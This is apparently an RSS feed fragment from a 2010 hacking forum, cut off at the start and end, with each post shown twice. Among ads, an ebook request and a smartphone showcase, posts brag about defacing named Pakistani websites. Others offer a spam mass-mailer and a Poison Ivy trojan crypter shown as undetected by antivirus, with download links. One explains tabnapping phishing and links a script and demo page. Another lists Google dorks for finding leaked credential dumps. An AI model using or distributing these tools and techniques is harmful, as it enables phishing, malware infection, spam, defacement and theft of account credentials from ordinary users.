<a href="http://www.onbux.com/?rh=01d4adeb754485392fc870ad8588e1ff" target="_blank">click here to start making money</a><br />
<br />
<img src="http://img178.imageshack.us/img178/5445/94007177.png" border="0" alt="[Image: 94007177.png&#93;" />]]></description>
			<content:encoded><![CDATA[<a href="http://www.onbux.com/?rh=01d4adeb754485392fc870ad8588e1ff" target="_blank"><img src="http://images.onbux.com/banner.jpg" border="0" alt="[Image: banner.jpg]" /></a><br />
<br />
Welcome to onBux . . .<br />
We are an advertising system that connects advertisers to possible consumers.<br />
As members, users begin to be paid to view advertisements provided by our sponsors, ensuring benefits to advertisers and you.<br />
<br />
What you get as a member:<br />
 Earn up to &#36;0.02 (2 cents) per click.<br />
 Earn up to &#36;0.01 (1 cent) for every ad your referrals click.<br />
 Instant Payment / Receiving System.<br />
<br />
<a href="http://www.onbux.com/?rh=01d4adeb754485392fc870ad8588e1ff" target="_blank">click here to start making money</a><br />
<br />
<img src="http://img178.imageshack.us/img178/5445/94007177.png" border="0" alt="[Image: 94007177.png]" />]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Secret of hacking ebook???]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1886</link>
			<pubDate>Wed, 01 Sep 2010 15:56:08 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1886</guid>
			<description><![CDATA[Can any one provide me with the second and third editions of the secret of hacking ebook by leo impact security.searched the web but wasnt able to find one.can someone please upload the page scans if anyone happens to have the books????please this is a request]]></description>
			<content:encoded><![CDATA[Can any one provide me with the second and third editions of the secret of hacking ebook by leo impact security.searched the web but wasnt able to find one.can someone please upload the page scans if anyone happens to have the books????please this is a request]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[PDF Creator]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1884</link>
			<pubDate>Tue, 31 Aug 2010 11:21:46 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1884</guid>
			<description><![CDATA[<a href="http://www.oxpdf.com/pdf-creator.html" target="_blank"><span style="font-weight: bold;">PDF Creator</span></a> is an all-functional PDF maker tool that can create PDF  documents from any printable files, such as txt, images (JPEG, GIF, PNG, BMP, EMF, EWF, TIFF), compatible with Microsoft Office 2003/2007/2010, support converting Word (doc, docx), PowerPoint (ppt, pptx), Excel (xls, xlsx) to PDF file. Besides PDF document creating, the PDF File Creator can also save file format as PNG, JPEG, BMP, PCX, TIFF and PS, EPS under "option" settings.<br />
Working as virtual printer, PDF Creator program can realize PDF creating with simple "Print" button clicking, free download supported.<br />
<br />
<img src="http://www.oxpdf.com/images/screenshot/pdf-creator/interface.gif" border="0" alt="[Image: interface.gif&#93;" /><br />
1. Add file with various ways: Printing, drag and drop, document adding, and more.<br />
2. Click "Options" to edit pdf file.<br />
3. Click "Create" button to create pdf file.]]></description>
			<content:encoded><![CDATA[<a href="http://www.oxpdf.com/pdf-creator.html" target="_blank"><span style="font-weight: bold;">PDF Creator</span></a> is an all-functional PDF maker tool that can create PDF  documents from any printable files, such as txt, images (JPEG, GIF, PNG, BMP, EMF, EWF, TIFF), compatible with Microsoft Office 2003/2007/2010, support converting Word (doc, docx), PowerPoint (ppt, pptx), Excel (xls, xlsx) to PDF file. Besides PDF document creating, the PDF File Creator can also save file format as PNG, JPEG, BMP, PCX, TIFF and PS, EPS under "option" settings.<br />
Working as virtual printer, PDF Creator program can realize PDF creating with simple "Print" button clicking, free download supported.<br />
<br />
<img src="http://www.oxpdf.com/images/screenshot/pdf-creator/interface.gif" border="0" alt="[Image: interface.gif]" /><br />
1. Add file with various ways: Printing, drag and drop, document adding, and more.<br />
2. Click "Options" to edit pdf file.<br />
3. Click "Create" button to create pdf file.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Showcase your Smart Phone...]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1878</link>
			<pubDate>Sun, 29 Aug 2010 02:12:41 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1878</guid>
			<description><![CDATA[<span style="color: #00BFFF;"><span style="font-size: Small;"><span style="font-family: Verdana;">Showcase your Smart Phone...</span></span></span><br />
<br />
<span style="color: #00BFFF;"><span style="font-size: Small;"><span style="font-family: Verdana;">Hey guys and gals(If you're the game), Show us which smart phone you got and how you use it... to what extent you utilize its features...<br />
To begin with here's how my phone looks like and how I use it...<br />
<br />
Phone Model: HTC Hero<br />
Operating System: Android 1.6 (With root permissions)<br />
<br />
Phone is Locked:<br />
<img src="http://i34.tinypic.com/2u6jsqd.png" border="0" alt="[Image: 2u6jsqd.png&#93;" /><br />
<br />
<br />
Home screens:</span></span></span><br />
<span style="color: #00BFFF;"><span style="font-size: Small;"><span style="font-family: Verdana;">Phone offers 7 Home screens, 4 of which are as below in order:</span></span></span><br />
<img src="http://i33.tinypic.com/2ij0ydw.png" border="0" alt="[Image: 2ij0ydw.png&#93;" /><br />
<br />
<img src="http://i36.tinypic.com/2je9h4.png" border="0" alt="[Image: 2je9h4.png&#93;" /><br />
<br />
<img src="http://i38.tinypic.com/2dnoy0.png" border="0" alt="[Image: 2dnoy0.png&#93;" /><br />
<br />
<img src="http://i36.tinypic.com/iv8p3s.png" border="0" alt="[Image: iv8p3s.png&#93;" /><br />
<br />
<br />
<br />
<span style="color: #00BFFF;"><span style="font-size: Small;"><span style="font-family: Verdana;">OS Functions:</span></span></span><br />
<span style="color: #00BFFF;"><span style="font-size: Small;"><span style="font-family: Verdana;">There are a handful of useful phone features which I use regularly... here are the screens:</span></span></span><br />
<br />
<span style="font-weight: bold;">Notifications:</span><br />
Keeps notifying me of events requiring attention.<br />
<img src="http://i38.tinypic.com/2lj3ipc.png" border="0" alt="[Image: 2lj3ipc.png&#93;" /><br />
<br />
<br />
<span style="font-weight: bold;">Programs:</span><br />
List of programs available in main menu:<br />
<img src="http://i34.tinypic.com/315zmev.png" border="0" alt="[Image: 315zmev.png&#93;" /><br />
<br />
<br />
<span style="font-weight: bold;">Google Synchronize:</span><br />
This is an excellent feature. I can keep all my contacts on google server and keep synchronizing them with my phone.<br />
<br />
<img src="http://i37.tinypic.com/f3awrn.png" border="0" alt="[Image: f3awrn.png&#93;" /><br />
<br />
<br />
<br />
<span style="color: #00BFFF;"><span style="font-size: Small;"><span style="font-family: Verdana;">Third Party programs:</span></span></span><br />
<span style="color: #00BFFF;"><span style="font-size: Small;"><span style="font-family: Verdana;">Here are the third party programs I use... these are just indispensable:</span></span></span><br />
<br />
<span style="font-weight: bold;">Nimbuzz:</span><br />
Lets me stay connected 24/7 on GTalk, Yahoo, Facebook, Skype and MSN...<br />
<img src="http://i33.tinypic.com/t4y7fq.png" border="0" alt="[Image: t4y7fq.png&#93;" /><br />
<br />
<br />
<span style="font-weight: bold;">Opera:</span><br />
Sufficient for all browsing needs... I use it a lot to send free SMS.<br />
<img src="http://i35.tinypic.com/25p2xix.png" border="0" alt="[Image: 25p2xix.png&#93;" /><br />
<br />
<br />
<span style="font-weight: bold;">PDANet:</span><br />
Use it to go online through my laptop when I return home. That's my internet connection...<br />
<img src="http://i34.tinypic.com/28tvmf.png" border="0" alt="[Image: 28tvmf.png&#93;" /><br />
<br />
<br />
<span style="font-weight: bold;">Twitter:</span><br />
Keep in touch with latest news... friend updates... new offers in market and much more...<br />
<img src="http://i37.tinypic.com/25hfv2t.png" border="0" alt="[Image: 25hfv2t.png&#93;" /><br />
<br />
<br />
<span style="font-weight: bold;">WifiTether:</span><br />
When a friend drops in with his laptop and needs an internet connection. I turn on the phone into a WiFi hotspot so we both are connected...<br />
<img src="http://i33.tinypic.com/2lqcux.png" border="0" alt="[Image: 2lqcux.png&#93;" /><br />
<br />
<br />
<span style="font-weight: bold;">Footprints:</span><br />
This is amazing software... Whenever I take a picture, it stores my location GPS coordinates and exact address of the location along with picture which is quite handy...<br />
<img src="http://i34.tinypic.com/mj8xld.png" border="0" alt="[Image: mj8xld.png&#93;" /><br />
<br />
<br />
<span style="font-weight: bold;">Journey Tracker:</span><br />
I use it to track and record all my long walks... so that I can trace back to from where I started through the exact same route... and never be lost again... :-)<br />
<img src="http://i34.tinypic.com/23w30og.png" border="0" alt="[Image: 23w30og.png&#93;" /><br />
<br />
<br />
<span style="color: #00BFFF;"><span style="font-size: Small;"><span style="font-family: Verdana;">So guys, this is how I use my phone... lets share how you all use your phones... so that we can learn something new... for good...</span></span></span>...]]></description>
			<content:encoded><![CDATA[<span style="color: #00BFFF;"><span style="font-size: Small;"><span style="font-family: Verdana;">Showcase your Smart Phone...</span></span></span><br />
<br />
<span style="color: #00BFFF;"><span style="font-size: Small;"><span style="font-family: Verdana;">Hey guys and gals(If you're the game), Show us which smart phone you got and how you use it... to what extent you utilize its features...<br />
To begin with here's how my phone looks like and how I use it...<br />
<br />
Phone Model: HTC Hero<br />
Operating System: Android 1.6 (With root permissions)<br />
<br />
Phone is Locked:<br />
<img src="http://i34.tinypic.com/2u6jsqd.png" border="0" alt="[Image: 2u6jsqd.png]" /><br />
<br />
<br />
Home screens:</span></span></span><br />
<span style="color: #00BFFF;"><span style="font-size: Small;"><span style="font-family: Verdana;">Phone offers 7 Home screens, 4 of which are as below in order:</span></span></span><br />
<img src="http://i33.tinypic.com/2ij0ydw.png" border="0" alt="[Image: 2ij0ydw.png]" /><br />
<br />
<img src="http://i36.tinypic.com/2je9h4.png" border="0" alt="[Image: 2je9h4.png]" /><br />
<br />
<img src="http://i38.tinypic.com/2dnoy0.png" border="0" alt="[Image: 2dnoy0.png]" /><br />
<br />
<img src="http://i36.tinypic.com/iv8p3s.png" border="0" alt="[Image: iv8p3s.png]" /><br />
<br />
<br />
<br />
<span style="color: #00BFFF;"><span style="font-size: Small;"><span style="font-family: Verdana;">OS Functions:</span></span></span><br />
<span style="color: #00BFFF;"><span style="font-size: Small;"><span style="font-family: Verdana;">There are a handful of useful phone features which I use regularly... here are the screens:</span></span></span><br />
<br />
<span style="font-weight: bold;">Notifications:</span><br />
Keeps notifying me of events requiring attention.<br />
<img src="http://i38.tinypic.com/2lj3ipc.png" border="0" alt="[Image: 2lj3ipc.png]" /><br />
<br />
<br />
<span style="font-weight: bold;">Programs:</span><br />
List of programs available in main menu:<br />
<img src="http://i34.tinypic.com/315zmev.png" border="0" alt="[Image: 315zmev.png]" /><br />
<br />
<br />
<span style="font-weight: bold;">Google Synchronize:</span><br />
This is an excellent feature. I can keep all my contacts on google server and keep synchronizing them with my phone.<br />
<br />
<img src="http://i37.tinypic.com/f3awrn.png" border="0" alt="[Image: f3awrn.png]" /><br />
<br />
<br />
<br />
<span style="color: #00BFFF;"><span style="font-size: Small;"><span style="font-family: Verdana;">Third Party programs:</span></span></span><br />
<span style="color: #00BFFF;"><span style="font-size: Small;"><span style="font-family: Verdana;">Here are the third party programs I use... these are just indispensable:</span></span></span><br />
<br />
<span style="font-weight: bold;">Nimbuzz:</span><br />
Lets me stay connected 24/7 on GTalk, Yahoo, Facebook, Skype and MSN...<br />
<img src="http://i33.tinypic.com/t4y7fq.png" border="0" alt="[Image: t4y7fq.png]" /><br />
<br />
<br />
<span style="font-weight: bold;">Opera:</span><br />
Sufficient for all browsing needs... I use it a lot to send free SMS.<br />
<img src="http://i35.tinypic.com/25p2xix.png" border="0" alt="[Image: 25p2xix.png]" /><br />
<br />
<br />
<span style="font-weight: bold;">PDANet:</span><br />
Use it to go online through my laptop when I return home. That's my internet connection...<br />
<img src="http://i34.tinypic.com/28tvmf.png" border="0" alt="[Image: 28tvmf.png]" /><br />
<br />
<br />
<span style="font-weight: bold;">Twitter:</span><br />
Keep in touch with latest news... friend updates... new offers in market and much more...<br />
<img src="http://i37.tinypic.com/25hfv2t.png" border="0" alt="[Image: 25hfv2t.png]" /><br />
<br />
<br />
<span style="font-weight: bold;">WifiTether:</span><br />
When a friend drops in with his laptop and needs an internet connection. I turn on the phone into a WiFi hotspot so we both are connected...<br />
<img src="http://i33.tinypic.com/2lqcux.png" border="0" alt="[Image: 2lqcux.png]" /><br />
<br />
<br />
<span style="font-weight: bold;">Footprints:</span><br />
This is amazing software... Whenever I take a picture, it stores my location GPS coordinates and exact address of the location along with picture which is quite handy...<br />
<img src="http://i34.tinypic.com/mj8xld.png" border="0" alt="[Image: mj8xld.png]" /><br />
<br />
<br />
<span style="font-weight: bold;">Journey Tracker:</span><br />
I use it to track and record all my long walks... so that I can trace back to from where I started through the exact same route... and never be lost again... :-)<br />
<img src="http://i34.tinypic.com/23w30og.png" border="0" alt="[Image: 23w30og.png]" /><br />
<br />
<br />
<span style="color: #00BFFF;"><span style="font-size: Small;"><span style="font-family: Verdana;">So guys, this is how I use my phone... lets share how you all use your phones... so that we can learn something new... for good...</span></span></span>...]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Again fucked pakistani site]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1877</link>
			<pubDate>Fri, 27 Aug 2010 15:16:15 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1877</guid>
			<description><![CDATA[We support india.....<br />
<br />
<a href="http://www.lollywoodhungama.com" target="_blank">again pakistani site got fucked</a><br />
<br />
check it    <a href="http://www.lollywoodhungama.com/" target="_blank">http://www.lollywoodhungama.com/</a><br />
<br />
Regards, <br />
Codebreaker inc.<br />
<br />
Orkut: mail2sumitdewang@gmail.com<br />
gmail: mail2sumitdewang@gmail.com<br />
facebook: mail2sumitdewang@gmail.com<br />
twitter: mail2sumitdewang@gmail.com<br />
yahoo: mail2sumitdewang@gmail.com]]></description>
			<content:encoded><![CDATA[We support india.....<br />
<br />
<a href="http://www.lollywoodhungama.com" target="_blank">again pakistani site got fucked</a><br />
<br />
check it    <a href="http://www.lollywoodhungama.com/" target="_blank">http://www.lollywoodhungama.com/</a><br />
<br />
Regards, <br />
Codebreaker inc.<br />
<br />
Orkut: mail2sumitdewang@gmail.com<br />
gmail: mail2sumitdewang@gmail.com<br />
facebook: mail2sumitdewang@gmail.com<br />
twitter: mail2sumitdewang@gmail.com<br />
yahoo: mail2sumitdewang@gmail.com]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Successfully fucked pakistani site.....]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1876</link>
			<pubDate>Thu, 26 Aug 2010 22:24:22 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1876</guid>
			<description><![CDATA[..<br />
check it now<br />
<br />
<a href="http://www.kaziirani.com" target="_blank">defaced pakistani site</a>www.kaziirani.com<br />
<br />
<br />
codebreaker inc. india]]></description>
			<content:encoded><![CDATA[..<br />
check it now<br />
<br />
<a href="http://www.kaziirani.com" target="_blank">defaced pakistani site</a>www.kaziirani.com<br />
<br />
<br />
codebreaker inc. india]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Windows Live E-Mail Mass Bomber]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1874</link>
			<pubDate>Thu, 26 Aug 2010 14:00:03 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1874</guid>
			<description><![CDATA[<span style="font-weight: bold;">Info:</span><br />
<br />
Professional Windows Live mass mailer, for fast mail spam.<br />
<span style="font-weight: bold;"><br />
Picture:</span><br />
<br />
<img src="http://i38.tinypic.com/2r6h821.jpg" border="0" alt="[Image: 2r6h821.jpg&#93;" /><br />
<br />
<span style="font-weight: bold;">Video:</span><br />
<br />
<a href="http://www.youtube.com/watch?v=t1HaB6HNcXg" target="_blank">http://www.youtube.com/watch?v=t1HaB6HNcXg</a><br />
<br />
<span style="font-weight: bold;">ScanLogs:</span><br />
<br />
<a href="http://virusscan.jotti.org/en/scanresult/97c61de035f71561e0c146cd4679a5aec6658ceb" target="_blank">http://virusscan.jotti.org/en/scanresult...http://virusscan.jotti.org/en/scanresult/97c61de035f71561e0c146cd4679a5</a><br />
<br />
<a href="http://www.virustotal.com/file-scan/report.html?id=e908833e6aade8fc00d57084f748a48954bd2b2aa86a14df83e612e73b47c904-1282821396" target="_blank">http://www.virustotal.com/file-scan/repo...http://www.virustotal.com/file-scan/report.html?id=e908833e6aade8fc00d57084f748a48954bd2b2aa86a14df83e612e73b47c904-</a><br />
<br />
<a href="http://scanner2.novirusthanks.org/analysis/6d3fab5ff592b776dfd05b7e67bb9c5c/d2luZG93cy1saXZlLWUtbWFpbC1ib21iZXItZXhl/" target="_blank">http://scanner2.novirusthanks.org/analys...http://scanner2.novirusthanks.org/analysis/6d3fab5ff592b776dfd05b7e67bb9c5c/d2luZG93cy1saXZlLWUtbWFpbC1ib21</a><br />
<br />
<span style="font-weight: bold;">Download Link:</span><br />
<br />
Available only on ShareCash: <a href="http://fileme.us/1F7xT" target="_blank">http://fileme.us/1F7xT</a><br />
<br />
<span style="font-weight: bold;">Why?</span> <br />
<br />
Because I worked alot to make this working, and you need only to complete a 2 minute survey. <br />
<br />
If u really need and want this soft, than must worth your time.<br />
<br />
RAR Password: xPC FTW<br />
<br />
Credits: Tanaka]]></description>
			<content:encoded><![CDATA[<span style="font-weight: bold;">Info:</span><br />
<br />
Professional Windows Live mass mailer, for fast mail spam.<br />
<span style="font-weight: bold;"><br />
Picture:</span><br />
<br />
<img src="http://i38.tinypic.com/2r6h821.jpg" border="0" alt="[Image: 2r6h821.jpg]" /><br />
<br />
<span style="font-weight: bold;">Video:</span><br />
<br />
<a href="http://www.youtube.com/watch?v=t1HaB6HNcXg" target="_blank">http://www.youtube.com/watch?v=t1HaB6HNcXg</a><br />
<br />
<span style="font-weight: bold;">ScanLogs:</span><br />
<br />
<a href="http://virusscan.jotti.org/en/scanresult/97c61de035f71561e0c146cd4679a5aec6658ceb" target="_blank">http://virusscan.jotti.org/en/scanresult...http://virusscan.jotti.org/en/scanresult/97c61de035f71561e0c146cd4679a5</a><br />
<br />
<a href="http://www.virustotal.com/file-scan/report.html?id=e908833e6aade8fc00d57084f748a48954bd2b2aa86a14df83e612e73b47c904-1282821396" target="_blank">http://www.virustotal.com/file-scan/repo...http://www.virustotal.com/file-scan/report.html?id=e908833e6aade8fc00d57084f748a48954bd2b2aa86a14df83e612e73b47c904-</a><br />
<br />
<a href="http://scanner2.novirusthanks.org/analysis/6d3fab5ff592b776dfd05b7e67bb9c5c/d2luZG93cy1saXZlLWUtbWFpbC1ib21iZXItZXhl/" target="_blank">http://scanner2.novirusthanks.org/analys...http://scanner2.novirusthanks.org/analysis/6d3fab5ff592b776dfd05b7e67bb9c5c/d2luZG93cy1saXZlLWUtbWFpbC1ib21</a><br />
<br />
<span style="font-weight: bold;">Download Link:</span><br />
<br />
Available only on ShareCash: <a href="http://fileme.us/1F7xT" target="_blank">http://fileme.us/1F7xT</a><br />
<br />
<span style="font-weight: bold;">Why?</span> <br />
<br />
Because I worked alot to make this working, and you need only to complete a 2 minute survey. <br />
<br />
If u really need and want this soft, than must worth your time.<br />
<br />
RAR Password: xPC FTW<br />
<br />
Credits: Tanaka]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[New Phising TabNapping And Hack Gmail Yahoo Facebook Orkut  And Many More]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1873</link>
			<pubDate>Tue, 24 Aug 2010 12:58:44 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1873</guid>
			<description><![CDATA[<span style="color: #32CD32;"><div style="text-align: center;">Use This Script And Hack ........<br />
</div></span><br />
<span style="color: #FFA500;"><div style="text-align: center;">We all are familiar with the technique of phishing, tab-napping is the advanced form of phishing is out in the market, <br />
in which when u open any genuine page say the page of any legitimate website like any shop,etc... and if you dont use that<br />
page or in short if that page is kept idle for few seconds because of many reasons like we start browsing other site,<br />
attending phone calls etc, then malicious page automatically gets redirected to phished page or duplicate page of popular sites<br />
like gmail,orkut,facebook,yahoo,etc... which we didnt notice, coz.. we never opened that page, so it looks kinda of genuine page.<br />
</div></span><br />
<span style="color: #98FB98;">Method:<br />
How this is done:<br />
It is done by checking wether your page is idle or not, if it is idle or not used for some particular time period<br />
then it gets redirected:<br />
Things to be done:<br />
1.check for mouse movement<br />
2.check for scroll bar movement<br />
3.check for keystrokes<br />
<br />
If any of the above event is not triggered till few seconds , this means user is not using that tab, either is off from system <br />
or using other tab, so if these conditions are met, then we redirect it to our phished page, which user thinks it to be genuine<br />
page.<br />
</span><br />
<br />
Use This Script After Head<br />
<br />
<a href="http://yogeshmehra1987.110mb.com/tab%20napping.txt" target="_blank">Script Here</a><br />
<br />
<br />
<span style="color: #FF0000;"><div style="text-align: center;"><span style="font-size: medium;">Demo</span></div></span><br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://yogeshmehra1987.110mb.com/game2.php</code></div></div>
<br />
Open This Demo and Change Your tab &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;]]></description>
			<content:encoded><![CDATA[<span style="color: #32CD32;"><div style="text-align: center;">Use This Script And Hack ........<br />
</div></span><br />
<span style="color: #FFA500;"><div style="text-align: center;">We all are familiar with the technique of phishing, tab-napping is the advanced form of phishing is out in the market, <br />
in which when u open any genuine page say the page of any legitimate website like any shop,etc... and if you dont use that<br />
page or in short if that page is kept idle for few seconds because of many reasons like we start browsing other site,<br />
attending phone calls etc, then malicious page automatically gets redirected to phished page or duplicate page of popular sites<br />
like gmail,orkut,facebook,yahoo,etc... which we didnt notice, coz.. we never opened that page, so it looks kinda of genuine page.<br />
</div></span><br />
<span style="color: #98FB98;">Method:<br />
How this is done:<br />
It is done by checking wether your page is idle or not, if it is idle or not used for some particular time period<br />
then it gets redirected:<br />
Things to be done:<br />
1.check for mouse movement<br />
2.check for scroll bar movement<br />
3.check for keystrokes<br />
<br />
If any of the above event is not triggered till few seconds , this means user is not using that tab, either is off from system <br />
or using other tab, so if these conditions are met, then we redirect it to our phished page, which user thinks it to be genuine<br />
page.<br />
</span><br />
<br />
Use This Script After Head<br />
<br />
<a href="http://yogeshmehra1987.110mb.com/tab%20napping.txt" target="_blank">Script Here</a><br />
<br />
<br />
<span style="color: #FF0000;"><div style="text-align: center;"><span style="font-size: medium;">Demo</span></div></span><br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://yogeshmehra1987.110mb.com/game2.php</code></div></div>
<br />
Open This Demo and Change Your tab &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Poison Ivy Crypter v5 (Last version)]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1872</link>
			<pubDate>Mon, 23 Aug 2010 22:27:07 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1872</guid>
			<description><![CDATA[File name:<br />
Poison Ivy.exe<br />
Submission date:<br />
2010-08-23 19:44:48 (UTC)<br />
Current status:<br />
queued (#11) queued (#11) analysing finished<br />
Result:<br />
0/ 42 (0.0%)<br />
	<br />
VT Community<br />
<br />
not reviewed<br />
 Safety score: - <br />
Compact<br />
Print results<br />
Antivirus 	Version 	Last Update 	Result<br />
AhnLab-V3	2010.08.23.06	2010.08.23	-<br />
AntiVir	8.2.4.38	2010.08.23	-<br />
Antiy-AVL	2.0.3.7	2010.08.23	-<br />
Authentium	5.2.0.5	2010.08.23	-<br />
Avast	4.8.1351.0	2010.08.22	-<br />
Avast5	5.0.332.0	2010.08.22	-<br />
AVG	9.0.0.851	2010.08.23	-<br />
BitDefender	7.2	2010.08.23	-<br />
CAT-QuickHeal	11.00	2010.08.23	-<br />
ClamAV	0.96.2.0-git	2010.08.23	-<br />
Comodo	5834	2010.08.23	-<br />
DrWeb	5.0.2.03300	2010.08.23	-<br />
Emsisoft	5.0.0.37	2010.08.23	-<br />
eSafe	7.0.17.0	2010.08.23	-<br />
eTrust-Vet	36.1.7808	2010.08.23	-<br />
F-Prot	4.6.1.107	2010.08.22	-<br />
F-Secure	9.0.15370.0	2010.08.23	-<br />
Fortinet	4.1.143.0	2010.08.23	-<br />
GData	21	2010.08.23	-<br />
Ikarus	T3.1.1.88.0	2010.08.23	-<br />
Jiangmin	13.0.900	2010.08.23	-<br />
Kaspersky	7.0.0.125	2010.08.23	-<br />
McAfee	5.400.0.1158	2010.08.23	-<br />
McAfee-GW-Edition	2010.1B	2010.08.23	-<br />
Microsoft	1.6103	2010.08.23	-<br />
NOD32	5390	2010.08.23	-<br />
Norman	6.05.11	2010.08.23	-<br />
nProtect	2010-08-23.01	2010.08.23	-<br />
Panda	10.0.2.7	2010.08.23	-<br />
PCTools	7.0.3.5	2010.08.23	-<br />
Prevx	3.0	2010.08.23	-<br />
Rising	22.62.00.04	2010.08.23	-<br />
Sophos	4.56.0	2010.08.23	-<br />
Sunbelt	6779	2010.08.23	-<br />
SUPERAntiSpyware	4.40.0.1006	2010.08.23	-<br />
Symantec	20101.1.1.7	2010.08.23	-<br />
TheHacker	6.5.2.1.355	2010.08.23	-<br />
TrendMicro	9.120.0.1004	2010.08.23	-<br />
TrendMicro-HouseCall	9.120.0.1004	2010.08.23	-<br />
VBA32	3.12.14.0	2010.08.23	-<br />
ViRobot	2010.8.23.4003	2010.08.23	-<br />
VirusBuster	5.0.27.0	2010.08.23	-<br />
<br />
<a href="http://hotfile.com/dl/64136706/d8500f0/poison_ivy_trojan.rar.html" target="_blank">http://hotfile.com/dl/64136706/d8500f0/p...http://hotfile.com/dl/64136706/d8500f0/poison_ivy_troja</a>]]></description>
			<content:encoded><![CDATA[File name:<br />
Poison Ivy.exe<br />
Submission date:<br />
2010-08-23 19:44:48 (UTC)<br />
Current status:<br />
queued (#11) queued (#11) analysing finished<br />
Result:<br />
0/ 42 (0.0%)<br />
	<br />
VT Community<br />
<br />
not reviewed<br />
 Safety score: - <br />
Compact<br />
Print results<br />
Antivirus 	Version 	Last Update 	Result<br />
AhnLab-V3	2010.08.23.06	2010.08.23	-<br />
AntiVir	8.2.4.38	2010.08.23	-<br />
Antiy-AVL	2.0.3.7	2010.08.23	-<br />
Authentium	5.2.0.5	2010.08.23	-<br />
Avast	4.8.1351.0	2010.08.22	-<br />
Avast5	5.0.332.0	2010.08.22	-<br />
AVG	9.0.0.851	2010.08.23	-<br />
BitDefender	7.2	2010.08.23	-<br />
CAT-QuickHeal	11.00	2010.08.23	-<br />
ClamAV	0.96.2.0-git	2010.08.23	-<br />
Comodo	5834	2010.08.23	-<br />
DrWeb	5.0.2.03300	2010.08.23	-<br />
Emsisoft	5.0.0.37	2010.08.23	-<br />
eSafe	7.0.17.0	2010.08.23	-<br />
eTrust-Vet	36.1.7808	2010.08.23	-<br />
F-Prot	4.6.1.107	2010.08.22	-<br />
F-Secure	9.0.15370.0	2010.08.23	-<br />
Fortinet	4.1.143.0	2010.08.23	-<br />
GData	21	2010.08.23	-<br />
Ikarus	T3.1.1.88.0	2010.08.23	-<br />
Jiangmin	13.0.900	2010.08.23	-<br />
Kaspersky	7.0.0.125	2010.08.23	-<br />
McAfee	5.400.0.1158	2010.08.23	-<br />
McAfee-GW-Edition	2010.1B	2010.08.23	-<br />
Microsoft	1.6103	2010.08.23	-<br />
NOD32	5390	2010.08.23	-<br />
Norman	6.05.11	2010.08.23	-<br />
nProtect	2010-08-23.01	2010.08.23	-<br />
Panda	10.0.2.7	2010.08.23	-<br />
PCTools	7.0.3.5	2010.08.23	-<br />
Prevx	3.0	2010.08.23	-<br />
Rising	22.62.00.04	2010.08.23	-<br />
Sophos	4.56.0	2010.08.23	-<br />
Sunbelt	6779	2010.08.23	-<br />
SUPERAntiSpyware	4.40.0.1006	2010.08.23	-<br />
Symantec	20101.1.1.7	2010.08.23	-<br />
TheHacker	6.5.2.1.355	2010.08.23	-<br />
TrendMicro	9.120.0.1004	2010.08.23	-<br />
TrendMicro-HouseCall	9.120.0.1004	2010.08.23	-<br />
VBA32	3.12.14.0	2010.08.23	-<br />
ViRobot	2010.8.23.4003	2010.08.23	-<br />
VirusBuster	5.0.27.0	2010.08.23	-<br />
<br />
<a href="http://hotfile.com/dl/64136706/d8500f0/poison_ivy_trojan.rar.html" target="_blank">http://hotfile.com/dl/64136706/d8500f0/p...http://hotfile.com/dl/64136706/d8500f0/poison_ivy_troja</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[What are these]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1868</link>
			<pubDate>Mon, 23 Aug 2010 10:28:24 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1868</guid>
			<description><![CDATA[Hey friends I just type following dorks in google search and I got something strange and I am unable to understand that can anyone tell me what are these things<br />
<blockquote><cite>Quote:</cite>ext:sql intext:"INSERT INTO" intext:@gmail.com intext:password<br />
<br />
ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e<br />
<br />
<br />
ext:sql intext:"INSERT INTO" intext:@hotmail.com intext:password<br />
<br />
<br />
ext:sql intext:@hotmail.com intext:password</blockquote>
]]></description>
			<content:encoded><![CDATA[Hey friends I just type following dorks in google search and I got something strange and I am unable to understand that can anyone tell me what are these things<br />
<blockquote><cite>Quote:</cite>ext:sql intext:"INSERT INTO" intext:@gmail.com intext:password<br />
<br />
ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e<br />
<br />
<br />
ext:sql intext:"INSERT INTO" intext:@hotmail.com intext:password<br />
<br />
<br />
ext:sql intext:@hotmail.com intext:password</blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Linux kernel had bug for years]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1867</link>
